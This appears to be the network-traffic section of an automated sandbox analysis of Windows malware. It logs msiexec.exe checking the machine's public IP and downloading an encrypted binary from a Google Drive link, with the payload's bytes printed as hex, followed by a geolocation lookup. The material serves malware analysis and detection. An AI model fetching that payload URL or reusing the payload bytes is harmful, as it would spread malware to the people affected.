                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                1192.168.2.451966158.101.44.242805788C:\Windows\SysWOW64\msiexec.exe
                TimestampBytes transferredDirectionData
                Oct 28, 2024 06:47:23.858371973 CET127OUTGET / HTTP/1.1
                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                Host: checkip.dyndns.org
                Oct 28, 2024 06:47:24.495786905 CET323INHTTP/1.1 200 OK
                Date: Mon, 28 Oct 2024 05:47:24 GMT
                Content-Type: text/html
                Content-Length: 106
                Connection: keep-alive
                Cache-Control: no-cache
                Pragma: no-cache
                X-Request-ID: 99478933d238e1005b3746c051cda6c1
                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                2192.168.2.451973158.101.44.242805788C:\Windows\SysWOW64\msiexec.exe
                TimestampBytes transferredDirectionData
                Oct 28, 2024 06:47:25.276262999 CET151OUTGET / HTTP/1.1
                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                Host: checkip.dyndns.org
                Connection: Keep-Alive
                Oct 28, 2024 06:47:25.914880991 CET323INHTTP/1.1 200 OK
                Date: Mon, 28 Oct 2024 05:47:25 GMT
                Content-Type: text/html
                Content-Length: 106
                Connection: keep-alive
                Cache-Control: no-cache
                Pragma: no-cache
                X-Request-ID: ed3115284630e7f31c8dcf214e36e442
                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                3192.168.2.451985158.101.44.242805788C:\Windows\SysWOW64\msiexec.exe
                TimestampBytes transferredDirectionData
                Oct 28, 2024 06:47:26.680152893 CET151OUTGET / HTTP/1.1
                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                Host: checkip.dyndns.org
                Connection: Keep-Alive
                Oct 28, 2024 06:47:28.170763969 CET323INHTTP/1.1 200 OK
                Date: Mon, 28 Oct 2024 05:47:28 GMT
                Content-Type: text/html
                Content-Length: 106
                Connection: keep-alive
                Cache-Control: no-cache
                Pragma: no-cache
                X-Request-ID: b3161e61eac438b06b0bc617147570b8
                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                4192.168.2.451998158.101.44.242805788C:\Windows\SysWOW64\msiexec.exe
                TimestampBytes transferredDirectionData
                Oct 28, 2024 06:47:29.132842064 CET151OUTGET / HTTP/1.1
                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                Host: checkip.dyndns.org
                Connection: Keep-Alive
                Oct 28, 2024 06:47:30.018893003 CET323INHTTP/1.1 200 OK
                Date: Mon, 28 Oct 2024 05:47:29 GMT
                Content-Type: text/html
                Content-Length: 106
                Connection: keep-alive
                Cache-Control: no-cache
                Pragma: no-cache
                X-Request-ID: 12ff71f0df32df554b4627b3f2fc7c39
                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                5192.168.2.452009158.101.44.242805788C:\Windows\SysWOW64\msiexec.exe
                TimestampBytes transferredDirectionData
                Oct 28, 2024 06:47:30.795032978 CET151OUTGET / HTTP/1.1
                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                Host: checkip.dyndns.org
                Connection: Keep-Alive
                Oct 28, 2024 06:47:31.445050001 CET323INHTTP/1.1 200 OK
                Date: Mon, 28 Oct 2024 05:47:31 GMT
                Content-Type: text/html
                Content-Length: 106
                Connection: keep-alive
                Cache-Control: no-cache
                Pragma: no-cache
                X-Request-ID: 98a1d0b80c892a97a2177484c6edc34d
                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                6192.168.2.452021158.101.44.242805788C:\Windows\SysWOW64\msiexec.exe
                TimestampBytes transferredDirectionData
                Oct 28, 2024 06:47:32.244872093 CET151OUTGET / HTTP/1.1
                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                Host: checkip.dyndns.org
                Connection: Keep-Alive
                Oct 28, 2024 06:47:32.884517908 CET323INHTTP/1.1 200 OK
                Date: Mon, 28 Oct 2024 05:47:32 GMT
                Content-Type: text/html
                Content-Length: 106
                Connection: keep-alive
                Cache-Control: no-cache
                Pragma: no-cache
                X-Request-ID: d19cc7f8b209d5e7708ca7473eb09734
                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.451907142.250.185.2064435788C:\Windows\SysWOW64\msiexec.exe
                TimestampBytes transferredDirectionData
                2024-10-28 05:47:14 UTC216OUTGET /uc?export=download&id=1tCaqQKvS9rlIMPrX0iRkU0L1WHfp7rKc HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                Host: drive.google.com
                Cache-Control: no-cache
                2024-10-28 05:47:14 UTC1610INHTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Mon, 28 Oct 2024 05:47:14 GMT
                Location: https://drive.usercontent.google.com/download?id=1tCaqQKvS9rlIMPrX0iRkU0L1WHfp7rKc&export=download
                Strict-Transport-Security: max-age=31536000
                Content-Security-Policy: script-src 'nonce-m1QAeqRzHk6rSIqsYerI-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Cross-Origin-Opener-Policy: same-origin
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                1192.168.2.451917172.217.16.1934435788C:\Windows\SysWOW64\msiexec.exe
                TimestampBytes transferredDirectionData
                2024-10-28 05:47:16 UTC258OUTGET /download?id=1tCaqQKvS9rlIMPrX0iRkU0L1WHfp7rKc&export=download HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                Cache-Control: no-cache
                Host: drive.usercontent.google.com
                Connection: Keep-Alive
                2024-10-28 05:47:18 UTC4933INHTTP/1.1 200 OK
                Content-Type: application/octet-stream
                Content-Security-Policy: sandbox
                Content-Security-Policy: default-src 'none'
                Content-Security-Policy: frame-ancestors 'none'
                X-Content-Security-Policy: sandbox
                Cross-Origin-Opener-Policy: same-origin
                Cross-Origin-Embedder-Policy: require-corp
                Cross-Origin-Resource-Policy: same-site
                X-Content-Type-Options: nosniff
                Content-Disposition: attachment; filename="FbTTxxaBDewHtzWhiFrSxKxK149.bin"
                Access-Control-Allow-Origin: *
                Access-Control-Allow-Credentials: false
                Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                Accept-Ranges: bytes
                Content-Length: 132160
                Last-Modified: Tue, 22 Oct 2024 16:08:55 GMT
                X-GUploader-UploadID: AHmUCY3a52Jb1GyK1U4LzCkK2xV3df0hv3V3quKGI56bXvJTu7IgHYKajxbqzDEcx75b1wD-8erHDALMjQ
                Date: Mon, 28 Oct 2024 05:47:18 GMT
                Expires: Mon, 28 Oct 2024 05:47:18 GMT
                Cache-Control: private, max-age=0
                X-Goog-Hash: crc32c=2xIDiw==
                Server: UploadServer
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close
                2024-10-28 05:47:18 UTC4933INData Raw: ed d0 0b 1b 7d 81 69 d2 e8 e7 69 b6 cf cf 94 67 3d 3a 85 1b 5a b5 3b 5f 86 2b 68 d0 13 f0 53 b8 10 50 ad 42 c7 23 25 45 43 5a 85 8e 53 36 ec 0c 69 0d cb ff e2 90 ec 2d 7f 49 f3 c3 fa 72 aa 02 60 a5 3f e4 c3 fc 0b f9 63 83 83 1e 4c 18 9d e7 f8 2c 79 94 90 f6 cf 36 44 e5 56 14 e9 98 48 ef fe d9 53 89 b3 e1 1e 90 59 47 5d 04 dc e3 07 17 28 c7 37 35 74 39 82 6b 0a 69 9d d6 ca 6e 10 11 f4 e2 1a 64 04 1b 7d 1d 5c a0 5d bb 7d a8 25 93 e2 8b 24 74 6a 33 a0 12 68 a2 da b9 4e ca 27 54 47 84 c6 66 ad fb ff 29 ab 44 14 ac 64 38 31 3a b4 34 01 05 cf 49 fb c1 ed e9 4f 83 ba 55 37 93 bb a0 69 7d 0b 5b 87 ff ce 60 03 e3 63 46 5b 00 02 75 e4 4d fb fe d0 38 41 35 6f 9f 22 44 da 38 9a db 3e 05 1e e1 21 ee fd aa 4f 5b d8 8f e8 5a 3d 5f d7 0d bc 63 72 8b 22 20 4c f9 51 d6 7f
                Data Ascii: }iig=:Z;_+hSPB#%ECZS6i-Ir`?cL,y6DVHSYG](75t9kind}\]}%$tj3hN'TGf)Dd81:4IOU7i}[`cF[uM8A5o"D8>!O[Z=_cr" LQ
                2024-10-28 05:47:19 UTC4829INData Raw: 76 09 67 74 78 b4 18 f8 30 20 06 a4 42 d3 2a e1 99 13 e0 59 96 17 df 8b 33 70 fc 1c 9c 97 5f 77 5e cd 7f 28 20 95 45 46 5e b0 de 01 c5 92 99 93 52 27 76 63 53 fd c9 8a 32 07 8a 52 5d 11 1a b6 6a 59 2e 80 36 45 7d 93 90 81 ff ff da b7 e6 a1 9e 32 c0 16 f0 fc 32 ec ca 0d af 38 e1 ee d5 45 3a 2b d6 78 31 ab 04 64 b4 57 fd d3 d5 ac 14 5d 5d 8a fb 98 8e 16 f3 67 f3 21 3b ac be ef ca 4a 2c 09 36 b5 e9 95 44 3d ef 56 64 4b bd 57 b4 8c 9c 59 89 c3 43 3b 8f 05 35 08 0e dc 93 a5 32 37 9a 45 56 7e 39 f2 c9 2f 76 c3 a4 3f 64 10 61 58 d8 bf 35 76 0a 71 d0 0d ba 79 e8 d0 fb f0 f1 8b 88 a6 21 07 3d b5 ef 03 cf 8a 78 0a bb 2b 49 a8 ae a4 73 2f ac 95 24 f9 80 70 8c 50 d5 47 05 bd 29 d2 6a e1 34 54 ee d6 8c 3d 4a b0 55 47 31 ce fa 0f 0f 9e 50 84 8f b5 68 8b e2 11 ad 51 00
                Data Ascii: vgtx0 B*Y3p_w^( EF^R'vcS2R]jY.6E}228E:+x1dW]]g!;J,6D=VdKWYC;527EV~9/v?daX5vqy!=x+Is/$pPG)j4T=JUG1PhQ
                2024-10-28 05:47:19 UTC1326INData Raw: 6a bc 7c 94 e6 27 6c 4f 38 a5 e8 3f a7 c5 a9 99 ed 8a 1a 68 c4 4b 26 1c 8c 26 bd 6d f6 a4 95 50 47 5f 0a ca 40 5d d2 11 59 2b b2 e4 e3 95 a8 28 74 b6 cd cc a9 aa 7f ca 2a 2b c1 f7 00 f7 cd cd a9 cd 61 70 f5 e6 a2 5b 8c 01 b0 12 53 23 fb 33 c5 a4 15 05 b8 9f ec 7c 52 db bd a9 8b 8b a6 7d 1d 87 72 31 e3 b3 07 cf 5c 8c c8 2f db cc a9 aa 24 ad f2 c4 43 aa e5 4a ea e2 0b 69 45 63 84 23 66 55 9b e0 06 4b 0f 29 4e 7a cb 6e 0c ac ee 6c af 3e c8 4f 0c de ed 5a 00 67 05 c9 99 16 bc 2d d1 0f a4 38 62 0b fe c5 66 e2 ff 96 67 77 bd 25 2f 87 4c 4e 49 38 c4 7c a7 25 5a ad 9d 69 3b ed 92 b4 44 b7 0d 91 fc 23 85 53 76 02 53 69 87 38 a9 35 52 6a 77 68 75 69 4a 54 22 61 cd 3b e1 33 a0 4f 8f 78 98 f9 e1 e6 c5 9a 16 80 54 c9 f3 99 55 40 30 fd 9e 77 62 25 1a a4 b4 a0 ab 63 c6
                Data Ascii: j|'lO8?hK&&mPG_@]Y+(t*+ap[S#3|R}r1\/$CJiEc#fUK)Nznl>OZg-8bfgw%/LNI8|%Zi;D#SvSi85RjwhuiJT"a;3OxTU@0wb%c
                2024-10-28 05:47:19 UTC1378INData Raw: a5 3a 7c 69 03 c9 65 54 b2 bd 03 8b 8f df 9c 0c 81 6e b3 c7 cf 08 c5 4d 8d ac 70 e4 f7 d9 bc 06 f7 f5 b6 44 aa 1b 3b 96 43 1a 63 63 62 e7 07 70 3a 23 f3 02 48 60 85 65 71 c1 6c 02 91 99 b5 a8 51 6f 4f 0c c5 90 5b 2a 67 04 de b9 ce b4 42 75 60 6e 32 71 05 fe c5 68 f3 76 96 67 79 d0 0b 3e 8e 65 e6 2e 2f d5 71 bd fb 5a ad 96 45 27 f5 84 c9 3e 7b 0d 90 99 22 94 5b 13 cf 8f 78 89 32 a9 38 52 6a 77 68 75 69 4a 55 22 3b 09 2e e1 49 56 ff 8f 78 92 87 ee ec ed cd 64 4f 49 17 83 89 57 16 31 e1 94 61 9e 24 6e a8 94 34 92 2c c7 91 48 aa b5 20 a0 25 2d ff a9 97 7e fc 0b f3 4f 3c 83 1e b9 e7 ee 27 40 2c 73 87 9d e7 c2 48 22 e5 56 10 9a 59 48 ef f4 b6 91 89 b3 eb 1e 81 54 28 9e 04 dc e9 79 3e 28 c7 33 5a b0 39 82 61 0a 78 90 a4 c7 79 10 61 d2 4c a0 6a 0e dd d7 c7 7d 68
                Data Ascii: :|ieTnMpD;Cccbp:#H`eqlQoO[*gBu`n2qhvgy>e./qZE'>{"[x28RjwhuiJU";.IVxdOIW1a$n4,H %-~O<'@,sH"VYHT(y>(3Z9axyaLj}h
                2024-10-28 05:47:19 UTC1378INData Raw: 75 63 5f 31 f5 13 5a 24 8e 9b 88 ff 85 6b 95 eb f2 c4 37 c9 16 8a 2d cb f3 9f 75 53 38 f0 97 5f bd 25 7d ae 96 32 ba 7e d0 87 3b 74 a1 de ac 02 3b 8c 71 e4 c0 f6 1a f1 08 5c 83 1e b9 e7 8c ee 3e 1c 79 94 94 99 2f 36 04 ef 56 3c be 98 48 e9 fe f1 0b 89 b3 e7 1e 90 87 57 78 2c e8 e3 07 1d 3b cc 37 1d 27 39 82 61 d4 69 9d fc 4a 6e 51 0d fa fd a0 6a 04 af 58 d0 7d 18 c8 f6 b0 89 b1 fa 8b f8 14 04 18 5c 82 60 09 ce e1 ea 26 a4 08 38 33 a4 80 03 8d 98 8a 39 92 2d 7a 88 52 8c 74 1a a9 4d 4d 36 e1 44 fc dd 37 e8 45 85 83 8d 37 93 eb f1 b9 14 47 5a 85 d7 3a 4d 94 8f 11 4d 4c 00 72 62 69 4e 1b fe d3 1c 5c 4a 12 9f 22 ae f3 3c 9a cf 38 6a a8 e1 21 e4 91 f1 54 5b a8 87 8d 5a 3d 75 ab 3c bc 63 36 a3 68 00 4c f3 23 df 66 00 33 b0 27 38 3f ed 61 25 f3 82 7b 0c 26 5f f5
                Data Ascii: uc_1Z$k7-uS8_%}2~;t;q\>y/6V<HWx,;7'9aiJnQjX}\`&839-zRtMM6D7E7GZ:MMLrbiN\J"<8j!T[Z=u<c6hL#f3'8?a%{&_
                2024-10-28 05:47:19 UTC1378INData Raw: 79 db 12 fc d6 fa aa 8d 8c 32 3b 33 ae af 2b 3f 89 8a 4d 8c 42 02 8c 20 7d 6e 12 d3 70 65 66 cb 5f c6 c2 c9 45 4a 83 ba 77 37 93 fa e5 17 5d 47 5a 80 90 f1 4d 94 8f 11 6b 5a 00 72 63 cc 1b 1b fe d8 2f b4 37 35 99 1b 20 de 38 9a b1 27 05 1e e5 53 15 f5 a6 3d 4d f0 f9 e8 5a 37 69 2b 0c b7 64 0b af 23 00 4c ed 81 bd 7f 00 42 b0 40 38 3f ed b1 3a f0 96 23 ac ab 5c ff 82 f0 c4 1d 01 2c ad 61 ed b9 b1 e7 d2 fc c5 d4 a0 f1 3d de e4 ed 95 e2 a3 fc 7a 32 4a 1e 3b d3 67 95 39 52 5c ea 1d 10 b7 d4 b3 2e ca c3 ed b1 02 e3 3f 7d 92 95 db d9 f0 4d 22 46 3a e3 94 ea 8d 3d bb 2f 13 02 9e 9e 83 84 9b 3c 5a bf 98 bb 92 1d 54 1f 21 bc 89 fb 60 08 46 bb 37 52 35 21 4e 94 c2 a9 91 8e b2 2b 4e e0 47 a0 54 4f c0 19 89 e6 2a 38 b5 06 74 80 2e 22 95 a7 63 32 1e e0 14 8b 61 16 c5
                Data Ascii: y2;3+?MB }npef_EJw7]GZMkZrc/75 8'S=MZ7i+d#LB@8?:#\,a=z2J;g9R\.?}M"F:=/<ZT!`F7R5!N+NGTO*8t."c2a
                2024-10-28 05:47:19 UTC1378INData Raw: fc 5f ba aa 62 a1 d4 21 de 0e e0 95 e2 29 bc 6d 1a f1 60 0a d9 c5 b4 09 6a 9b f0 17 1e 1b f1 aa 02 53 89 ed bb aa 64 31 1b 2d a5 6c a9 52 6f 2d c2 3a e9 37 ce f6 35 c9 6c 17 14 9c f8 20 84 eb 48 54 b7 e6 94 ba 54 50 61 07 ce 40 e7 13 c1 6e e6 3d 3d 89 30 58 8f d7 a9 2c 8e b2 27 53 b3 12 85 7c 7a e5 0f f1 1c 24 38 ed f7 51 97 0c 4d 95 a7 69 90 3b f8 4c 8f 0b 16 b5 c8 68 71 82 fa d2 b7 70 8e 06 4a d8 5c 6e 26 91 5f 92 c9 c9 59 0b 15 32 1f 70 cf 45 d1 18 97 dd a0 76 bc 4d 4b 87 36 9b d1 0a 4a 88 c3 2c 0b 0c 98 3a f2 77 8c 2e 2a ea 43 2b 29 f9 5c 75 32 b7 d3 30 60 9d e2 ed 97 74 54 a8 08 f9 55 bf b0 9a ad ab 5d 97 1e 4e be 5b 3f 67 33 cc 6b ba e6 2a 15 f5 16 c1 9b 8c ec b6 36 9a c1 d9 fc 54 bc b3 e0 00 2d d2 e1 91 c5 23 dd 54 73 80 b5 70 dd e6 65 b8 75 de a9
                Data Ascii: _b!)m`jSd1-lRo-:75l HTTPa@n==0X,'S|z$8QMi;LhqpJ\n&_Y2pEvMK6J,:w.*C+)\u20`tTU]N[?g3k*6T-#Tspeu
                2024-10-28 05:47:19 UTC1378INData Raw: 61 65 6f 2c fe 9a 92 c9 c3 59 1a 1d 23 18 1f 03 45 5f 12 97 cc 1c 19 71 4d 02 8c 36 45 d2 2f 62 bc 86 2c 01 1e 92 3a da 24 1b 2f 20 34 6e 2a 29 f9 e6 6c 32 b7 c7 42 af 8a a7 9d 81 5d 02 a8 08 f3 b0 43 b1 89 97 bb 56 ae 4b 4b be 5b 2f 73 cd ca 1f ba e6 2d 66 4b 16 c1 0e a0 53 b6 c1 90 c1 aa aa 51 bc b9 e3 0c 3c de da b7 c5 22 ca 17 b0 80 a4 7a b2 24 6f b8 7f cf b8 32 9d 75 58 6b d0 d2 19 a9 81 cd 20 b5 92 a4 cd 43 7c fb 85 6f 07 64 21 a9 2f b1 b2 60 70 c2 6b cf 93 a9 91 29 8f c8 c0 23 86 20 6f 4b 3f ca b5 74 e7 8f 73 98 89 47 e1 62 e4 1f ad 59 83 76 0d 38 f8 38 90 93 e2 0a 08 42 f3 65 c1 eb e6 bc bb 8c 3d c5 e5 41 c4 1e 42 c3 4c fb e8 54 fb 46 7e 24 a9 91 b4 b9 09 6f c5 34 e1 8e 3b 67 b2 2a 09 c6 05 69 73 f8 63 ca 24 9a 52 24 68 fa e4 fd 63 e6 21 09 97 11
                Data Ascii: aeo,Y#E_qM6E/b,:$/ 4n*)l2B]CVKK[/s-fKSQ<"z$o2uXk C|od!/`pk)# oK?tsGbYv88Be=ABLTF~$o4;g*isc$R$hc!
                2024-10-28 05:47:19 UTC1378INData Raw: 4f 71 81 94 c3 43 3a f7 f7 e2 31 64 51 90 9e ac 3f 2a 02 61 7d ea f5 f3 bd 35 8f b2 0d c3 91 08 d4 4b 2e cc 65 18 e3 fd 46 a6 38 37 43 4d 8f ca 90 59 f3 5a ca 1d e2 40 71 57 e2 7a a0 67 c0 71 ca eb e0 ab 14 81 4a b7 b0 5b d7 60 f1 e6 44 35 e8 5e fa 7d c3 35 a7 e8 7d d6 71 65 d6 2e fc 8a 5e 83 b2 2c 29 d7 19 2b 82 e4 34 ba 5a 94 73 24 6c c3 ad e0 ee ac 53 1a 8e 34 6d b7 62 6c e4 6f cd 0f d3 c0 ec 22 5c 5c 85 76 29 04 9e 16 9f 08 b8 a2 d3 a9 db 68 bf 77 d0 28 c4 56 49 62 ec 0e 94 6f 7e a6 9d 85 81 ff 35 bf 41 de a6 54 da aa 21 cb 60 51 22 bb ed ec 1f e6 72 e5 c9 d6 fa 50 b8 82 34 ec 42 17 c2 5a 06 63 33 97 86 79 7b 2e 0f 2f 51 aa 8b 49 5a 0e b5 ff e8 df b0 2e 5d b5 f5 46 b0 24 0e 7d 3a 4f ff d6 69 0f 36 64 5a da d7 4f 5f 11 95 91 56 45 00 f3 72 6d 92 5f 39
                Data Ascii: OqC:1dQ?*a}5K.eF87CMYZ@qWzgqJ[`D5^}5}qe.^,)+4Zs$lS4mblo"\\v)hw(VIbo~5AT!`Q"rP4BZc3y{./QIZ.]F$}:Oi6dZO_VErm_9
                2024-10-28 05:47:19 UTC1378INData Raw: 23 79 40 55 1a 2d 76 ab a2 ba 6f 32 36 ca d7 f4 ca 9a 6b 00 48 c8 24 b7 c2 c9 67 48 6f 65 d8 92 27 a4 e1 e5 14 5f ac 83 ea ff c1 fd e8 1b 51 26 13 c3 d8 86 b3 6e ef be 1b aa 2b b8 88 32 f7 5e 2a ea 20 2c 63 22 a7 af 79 fb 2b 0f 07 0b aa 8b 52 5a 6c 21 bf e8 db c3 f0 5d c7 8f 43 98 02 26 21 30 59 07 75 46 1e 71 5a 5b da d3 f9 aa 60 e7 b8 4f 6d 5d db 29 67 e0 52 8c ef 1c d7 7f 50 25 72 83 6d 35 6b 81 f6 48 ef d8 f3 5a 7f d8 45 8f 16 10 6a 44 87 29 c3 79 06 a0 1b fd 98 cc 27 14 5e 55 7d a3 a5 44 b5 c8 06 c7 11 85 9b f1 4e 6e 8b 80 9b 49 93 49 a1 8f 4c 29 b0 36 d7 25 99 74 36 d6 09 6c a9 f0 01 d7 e5 79 44 a9 30 2f 01 ab 2e bb 10 ca 91 8c 4d 21 a8 9d 81 7e 2b aa e0 87 f4 a6 8f 49 bf 4f 09 ca e1 0d 00 23 f6 33 29 bc cc eb 0b 56 f5 fe 2f 28 43 11 e5 e5 c0 d1 e9
                Data Ascii: #y@U-vo26kH$gHoe'_Q&n+2^* ,c"y+RZl!]C&!0YuFqZ[`Om])gRP%rm5kHZEjD)y'^U}DNnIIL)6%t6lyD0/.M!~+IO#3)V/(C


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                2192.168.2.451954188.114.97.34435788C:\Windows\SysWOW64\msiexec.exe
                TimestampBytes transferredDirectionData
                2024-10-28 05:47:21 UTC87OUTGET /xml/155.94.241.188 HTTP/1.1
                Host: reallyfreegeoip.org
                Connection: Keep-Alive
                2024-10-28 05:47:21 UTC881INHTTP/1.1 200 OK
                Date: Mon, 28 Oct 2024 05:47:21 GMT
                Content-Type: text/xml
                Content-Length: 358
                Connection: close
                apigw-requestid: AVhc-iOyPHcEJSw=
                Cache-Control: max-age=86400
                CF-Cache-Status: HIT
                Age: 17072
                Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT
                Accept-Ranges: bytes
